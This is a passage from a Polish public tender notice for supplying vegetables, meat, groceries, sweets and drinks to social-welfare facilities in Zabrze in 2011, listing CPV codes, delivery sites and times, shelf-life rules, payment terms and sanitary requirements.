Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7,
Sekretariat MOPR ul. Roosevelta 40.
Zamówienia będą realizowane częściami na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. 
Dostawa do wszystkich świetlic przeprowadzana będzie tego samego dnia najpóźniej do godziny 17.00. Do pozostałych placówek dostawa musi być przeprowadzona najpóźniej do godziny 15.00.
Gramatura oferowanego produktu nie może być niższa niż gramatura produktu wymienionego w szczegółowym kosztorysie ofertowym. 
Dostarczane wędliny (część 4), warzywa i owoce (część 3) muszą być świeże. Nabiał i tłuszcze (część 2) muszą posiadać termin przydatności do spożycia minimum 14 dni od dnia dostawy w przypadku mleka i tłuszczy termin wynosi minimum 30 dni. Artykuły spożywcze (część 5), słodycze (część 6) i napoje (część 7) muszą posiadać termin przydatności do spożycia wynoszący minimum 6 miesięcy od dnia dostawy. Słodycze nie mogą zawierać nadzienia alkoholowego. 
Ceny poszczególnych produktów przez czas trwania umowy muszą być stałe. Zamawiający zobowiązuje się zamówić co najmniej 70% wartości przedmiotu umowy. Pozostałe 30% zostanie zamówione w zależności od potrzeb Zamawiającego. 
Termin płatności za wszystkie dostarczone artykuły - 14 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionych faktur VAT.	
Na dokonanie pierwszej dostawy Wykonawca musi posiadać gotowość dostawy w terminie 2 dni od daty zawarcia umowy na podstawie zlecenia wystawionego przez Zamawiającego.
Wykonawca zobowiązany jest do wystawiania odrębnych faktur VAT na żywność określoną w zleceniach przez Zamawiającego przeznaczoną na potrzeby Programu na Rzecz Społeczności Romskiej w Polsce - Projekt Kulturalny, na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej - Grupy Wsparcia, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno- zawodowej w gminie Zabrze dla Doradcy ds. Osób Niepełnosprawnych, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Klubu Integracji Społecznej, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej. 
Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załącznikach od 1 do 7 do SIWZ. Wartość dokonanych przesunięć nie może przekroczyć 5% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
Żywność musi być dostarczona specjalistycznym transportem, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003 r.).
Dostarczane mięso i wyroby mięsne każdorazowo powinny pochodzić z udokumentowanego źródła i powinny spełniać wszelkie normy nałożone obowiązującymi w tym zakresie przepisami sanitarnymi i weterynaryjnymi m.in. z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17 poz. 127, ze zmianami); ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. nr 69, poz. 625 ze zmianami).
Produkty wytworzone będą zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o warunkach zdrowotnych żywności i żywienia z późniejszymi zmianami i podległymi jej aktualnymi Rozporządzeniami i aktami wykonawczymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 03.14.25.00-3, 15.41.11.00-3, 15.43.11.00-9, 15.51.12.10-8, 15.51.20.00-0, 15.53.00.00-2, 15.54.10.00-2, 15.54.21.00-0, 15.55.13.00-8, 15.54.40.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.	warzyw i owoców wskazanych w załączniku nr 3 do SIWZ - część 3 (CPV: 03212100-1, 03221220-4, 03221111-7, 03221112-4, 03221113-1, 03221210-1, 03221240-0, 03221270-9, 03221260-6, 03221410-3, 03222111-4, 03222210-8, 03222220-1, 03222321-9, 15331142-4, 03221420-6, 03222240-7)
Dostawy żywności (część 2-7) przeprowadzone będą własnym środkiem transportu i na własny koszt do n/w placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7,
Sekretariat MOPR ul. Roosevelta 40.
Zamówienia będą realizowane częściami na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. 
Dostawa do wszystkich świetlic przeprowadzana będzie tego samego dnia najpóźniej do godziny 17.00. Do pozostałych placówek dostawa musi być przeprowadzona najpóźniej do godziny 15.00.
Gramatura oferowanego produktu nie może być niższa niż gramatura produktu wymienionego w szczegółowym kosztorysie ofertowym. 
Dostarczane wędliny (część 4), warzywa i owoce (część 3) muszą być świeże. Nabiał i tłuszcze (część 2) muszą posiadać termin przydatności do spożycia minimum 14 dni od dnia dostawy w przypadku mleka i tłuszczy termin wynosi minimum 30 dni. Artykuły spożywcze (część 5), słodycze (część 6) i napoje (część 7) muszą posiadać termin przydatności do spożycia wynoszący minimum 6 miesięcy od dnia dostawy. Słodycze nie mogą zawierać nadzienia alkoholowego. 
Ceny poszczególnych produktów przez czas trwania umowy muszą być stałe. Zamawiający zobowiązuje się zamówić co najmniej 70% wartości przedmiotu umowy. Pozostałe 30% zostanie zamówione w zależności od potrzeb Zamawiającego. 
Termin płatności za wszystkie dostarczone artykuły - 14 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionych faktur VAT.	
Na dokonanie pierwszej dostawy Wykonawca musi posiadać gotowość dostawy w terminie 2 dni od daty zawarcia umowy na podstawie zlecenia wystawionego przez Zamawiającego.
Wykonawca zobowiązany jest do wystawiania odrębnych faktur VAT na żywność określoną w zleceniach przez Zamawiającego przeznaczoną na potrzeby Programu na Rzecz Społeczności Romskiej w Polsce - Projekt Kulturalny, na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej - Grupy Wsparcia, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno- zawodowej w gminie Zabrze dla Doradcy ds. Osób Niepełnosprawnych, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Klubu Integracji Społecznej, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt.Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej. 
Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załącznikach od 1 do 7 do SIWZ. Wartość dokonanych przesunięć nie może przekroczyć 5% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
Żywność musi być dostarczona specjalistycznym transportem, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003 r.).
Dostarczane mięso i wyroby mięsne każdorazowo powinny pochodzić z udokumentowanego źródła i powinny spełniać wszelkie normy nałożone obowiązującymi w tym zakresie przepisami sanitarnymi i weterynaryjnymi m.in. z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17 poz. 127, ze zmianami); ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. nr 69, poz. 625 ze zmianami).
Produkty wytworzone będą zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o warunkach zdrowotnych żywności i żywienia z późniejszymi zmianami i podległymi jej aktualnymi Rozporządzeniami i aktami wykonawczymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1, 03.22.12.20-4, 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.12.10-8, 03.22.22.20-1, 03.22.23.21-9, 15.33.11.42-4, 03.22.14.20-6, 03.22.22.40-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WĘDLINY I MIĘSO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4.	wędlin i mięsa wskazanych w załączniku nr 4 do SIWZ - część 4 (CPV: 15100000-9, 15110000-2, 15131130-5, 15112000-6, 15131410-2, 15130000-8, 15131135-0, 15131134-3)
Dostawy żywności (część 2-7) przeprowadzone będą własnym środkiem transportu i na własny koszt do n/w placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7,
Sekretariat MOPR ul. Roosevelta 40.
Zamówienia będą realizowane częściami na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. 
Dostawa do wszystkich świetlic przeprowadzana będzie tego samego dnia najpóźniej do godziny 17.00. Do pozostałych placówek dostawa musi być przeprowadzona najpóźniej do godziny 15.00.
Gramatura oferowanego produktu nie może być niższa niż gramatura produktu wymienionego w szczegółowym kosztorysie ofertowym. 
Dostarczane wędliny (część 4), warzywa i owoce (część 3) muszą być świeże. Nabiał i tłuszcze (część 2) muszą posiadać termin przydatności do spożycia minimum 14 dni od dnia dostawy w przypadku mleka i tłuszczy termin wynosi minimum 30 dni. Artykuły spożywcze (część 5), słodycze (część 6) i napoje (część 7) muszą posiadać termin przydatności do spożycia wynoszący minimum 6 miesięcy od dnia dostawy. Słodycze nie mogą zawierać nadzienia alkoholowego. 
Ceny poszczególnych produktów przez czas trwania umowy muszą być stałe. Zamawiający zobowiązuje się zamówić co najmniej 70% wartości przedmiotu umowy. Pozostałe 30% zostanie zamówione w zależności od potrzeb Zamawiającego. 
Termin płatności za wszystkie dostarczone artykuły - 14 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionych faktur VAT.	
Na dokonanie pierwszej dostawy Wykonawca musi posiadać gotowość dostawy w terminie 2 dni od daty zawarcia umowy na podstawie zlecenia wystawionego przez Zamawiającego.
Wykonawca zobowiązany jest do wystawiania odrębnych faktur VAT na żywność określoną w zleceniach przez Zamawiającego przeznaczoną na potrzeby Programu na Rzecz Społeczności Romskiej w Polsce - Projekt Kulturalny, na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej - Grupy Wsparcia, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno- zawodowej w gminie Zabrze dla Doradcy ds. Osób Niepełnosprawnych, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrzedla Klubu Integracji Społecznej, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej. 
Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załącznikach od 1 do 7 do SIWZ. Wartość dokonanych przesunięć nie może przekroczyć 5% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
Żywność musi być dostarczona specjalistycznym transportem, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003 r.).
Dostarczane mięso i wyroby mięsne każdorazowo powinny pochodzić z udokumentowanego źródła i powinny spełniać wszelkie normy nałożone obowiązującymi w tym zakresie przepisami sanitarnymi i weterynaryjnymi m.in. z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17 poz. 127, ze zmianami); ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. nr 69, poz. 625 ze zmianami).
Produkty wytworzone będą zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o warunkach zdrowotnych żywności i żywienia z późniejszymi zmianami i podległymi jej aktualnymi Rozporządzeniami i aktami wykonawczymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.13.11.30-5, 15.11.20.00-6, 15.13.14.10-2, 15.13.00.00-8, 15.13.11.35-0, 15.13.11.34-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5.	artykułów spożywczych wskazanych w załączniku nr 5 do SIWZ - część 5 (CPV: 15800000-6, 15831000-2, 15841000-5, 15332240-8, 15863000-5, 15871230-5, 15871250-1, 15871260-4, 15331470-2, 15871273-8, 15872400-5, 15891400-4, 15200000-0, 15332290-3,15612100-2, 15613311-1, 15614100-6, 15872100-2, 15861000-1, 15322000-1, 15896000-5, 15220000-6, 15232000-3, 15131000-5, 15119600-1)Dostawy żywności (część 2-7) przeprowadzone będą własnym środkiem transportu i na własny koszt do n/w placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7,
Sekretariat MOPR ul. Roosevelta 40.
Zamówienia będą realizowane częściami na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. 
Dostawa do wszystkich świetlic przeprowadzana będzie tego samego dnia najpóźniej do godziny 17.00. Do pozostałych placówek dostawa musi być przeprowadzona najpóźniej do godziny 15.00.
Gramatura oferowanego produktu nie może być niższa niż gramatura produktu wymienionego w szczegółowym kosztorysie ofertowym. 
Dostarczane wędliny (część 4), warzywa i owoce (część 3) muszą być świeże. Nabiał i tłuszcze (część 2) muszą posiadać termin przydatności do spożycia minimum 14 dni od dnia dostawy w przypadku mleka i tłuszczy termin wynosi minimum 30 dni. Artykuły spożywcze (część 5), słodycze (część 6) i napoje (część 7) muszą posiadać termin przydatności do spożycia wynoszący minimum 6 miesięcy od dnia dostawy. Słodycze nie mogą zawierać nadzienia alkoholowego. 
Ceny poszczególnych produktów przez czas trwania umowy muszą być stałe. Zamawiający zobowiązuje się zamówić co najmniej 70% wartości przedmiotu umowy. Pozostałe 30% zostanie zamówione w zależności od potrzeb Zamawiającego. 
Termin płatności za wszystkie dostarczone artykuły - 14 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionych faktur VAT.	
Na dokonanie pierwszej dostawy Wykonawca musi posiadać gotowość dostawy w terminie 2 dni od daty zawarcia umowy na podstawie zlecenia wystawionego przez Zamawiającego.
Wykonawca zobowiązany jest do wystawiania odrębnych faktur VAT na żywność określoną w zleceniach przez Zamawiającego przeznaczoną na potrzeby Programu na Rzecz Społeczności Romskiej w Polsce - Projekt Kulturalny, na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej - Grupy Wsparcia, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno- zawodowej w gminie Zabrze dla Doradcy ds. Osób Niepełnosprawnych, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Klubu Integracji Społecznej, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej. 
Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załącznikach od 1 do 7 do SIWZ. Wartość dokonanych przesunięć nie może przekroczyć 5% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
Żywność musi być dostarczona specjalistycznym transportem, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003 r.).
Dostarczane mięso i wyroby mięsne każdorazowo powinny pochodzić z udokumentowanego źródła i powinny spełniać wszelkie normy nałożone obowiązującymi w tym zakresie przepisami sanitarnymi i weterynaryjnymi m.in. z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17 poz. 127, ze zmianami); ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. nr 69, poz. 625 ze zmianami).
Produkty wytworzone będą zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o warunkach zdrowotnych żywności i żywienia z późniejszymi zmianami i podległymi jej aktualnymi Rozporządzeniami i aktami wykonawczymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.84.10.00-5, 15.33.22.40-8, 15.86.30.00-5, 15.89.14.00-4, 15.87.12.50-1, 15.87.12.60-4, 15.33.14.70-2, 15.87.12.73-8, 15.87.24.00-5, 15.89.14.00-4, 15.20.00.00-0, 15.33.22.90-3, 15.61.10.00-2, 15.61.33.11-1, 15.61.10.00-6, 15.87.21.00-2, 15.86.10.00-1, 15.32.20.00-1, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> SŁODYCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.	słodyczy wskazanych w załączniku nr 6 do SIWZ - część 6 (CPV: 15842220-0, 15821200-1, 15842100-3,    15842000-2, 15820000-2)
Dostawy żywności (część 2-7) przeprowadzone będą własnym środkiem transportu i na własny koszt do n/w placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7,
Sekretariat MOPR ul. Roosevelta 40.
Zamówienia będą realizowane częściami na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. 
Dostawa do wszystkich świetlic przeprowadzana będzie tego samego dnia najpóźniej do godziny 17.00. Do pozostałych placówek dostawa musi być przeprowadzona najpóźniej do godziny 15.00.
Gramatura oferowanego produktu nie może być niższa niż gramatura produktu wymienionego w szczegółowym kosztorysie ofertowym. 
Dostarczane wędliny (część 4), warzywa i owoce (część 3) muszą być świeże. Nabiał i tłuszcze (część 2) muszą posiadać termin przydatności do spożycia minimum 14 dni od dnia dostawy w przypadku mleka i tłuszczy termin wynosi minimum 30 dni. Artykuły spożywcze (część 5), słodycze (część 6) i napoje (część 7) muszą posiadać termin przydatności do spożycia wynoszący minimum 6 miesięcy od dnia dostawy. Słodycze nie mogą zawierać nadzienia alkoholowego. 
Ceny poszczególnych produktów przez czas trwania umowy muszą być stałe. Zamawiający zobowiązuje się zamówić co najmniej 70% wartości przedmiotu umowy. Pozostałe 30% zostanie zamówione w zależności od potrzeb Zamawiającego. 
Termin płatności za wszystkie dostarczone artykuły - 14 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionych faktur VAT.	
Na dokonanie pierwszej dostawy Wykonawca musi posiadać gotowość dostawy w terminie 2 dni od daty zawarcia umowy na podstawie zlecenia wystawionego przez Zamawiającego.
Wykonawca zobowiązany jest do wystawiania odrębnych faktur VAT na żywność określoną w zleceniach przez Zamawiającego przeznaczoną na potrzeby Programu na Rzecz Społeczności Romskiej w Polsce - Projekt Kulturalny, na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej - Grupy Wsparcia, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno- zawodowej w gminie Zabrze dla Doradcy ds. Osób Niepełnosprawnych, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Klubu Integracji Społecznej, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej. 
Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załącznikach od 1 do 7 do SIWZ. Wartość dokonanych przesunięć nie może przekroczyć 5% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
Żywność musi być dostarczona specjalistycznym transportem, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003 r.).
Dostarczane mięso i wyroby mięsne każdorazowo powinny pochodzić z udokumentowanego źródła i powinny spełniać wszelkie normy nałożone obowiązującymi w tym zakresie przepisami sanitarnymi i weterynaryjnymi m.in. z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17 poz. 127, ze zmianami); ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. nr 69, poz. 625 ze zmianami).
Produkty wytworzone będą zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o warunkach zdrowotnych żywności i żywienia z późniejszymi zmianami i podległymi jej aktualnymi Rozporządzeniami i aktami wykonawczymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.22.20-0, 15.82.12.00-1, 15.84.21.00-3, 15.84.20.00-2, 15.82.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> NAPOJE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 7.	napoi wskazanych w załączniku nr 7 do SIWZ - część 7 (CPV: 15981000-8, 15981400-2, 15981200-0, 15320000-7, 15321000-4, 15322000-1)
Dostawy żywności (część 2-7) przeprowadzone będą własnym środkiem transportu i na własny koszt do n/w placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7,
Sekretariat MOPR ul. Roosevelta 40.
Zamówienia będą realizowane częściami na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. 
Dostawa do wszystkich świetlic przeprowadzana będzie tego samego dnia najpóźniej do godziny 17.00. Do pozostałych placówek dostawa musi być przeprowadzona najpóźniej do godziny 15.00.
Gramatura oferowanego produktu nie może być niższa niż gramatura produktu wymienionego w szczegółowym kosztorysie ofertowym. 
Dostarczane wędliny (część 4), warzywa i owoce (część 3) muszą być świeże. Nabiał i tłuszcze (część 2) muszą posiadać termin przydatności do spożycia minimum 14 dni od dnia dostawy w przypadku mleka i tłuszczy termin wynosi minimum 30 dni. Artykuły spożywcze (część 5), słodycze (część 6) i napoje (część 7) muszą posiadać termin przydatności do spożycia wynoszący minimum 6 miesięcy od dnia dostawy. Słodycze nie mogą zawierać nadzienia alkoholowego. 
Ceny poszczególnych produktów przez czas trwania umowy muszą być stałe. Zamawiający zobowiązuje się zamówić co najmniej 70% wartości przedmiotu umowy. Pozostałe 30% zostanie zamówione w zależności od potrzeb Zamawiającego. 
Termin płatności za wszystkie dostarczone artykuły - 14 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionych faktur VAT.	
Na dokonanie pierwszej dostawy Wykonawca musi posiadać gotowość dostawy w terminie 2 dni od daty zawarcia umowy na podstawie zlecenia wystawionego przez Zamawiającego.
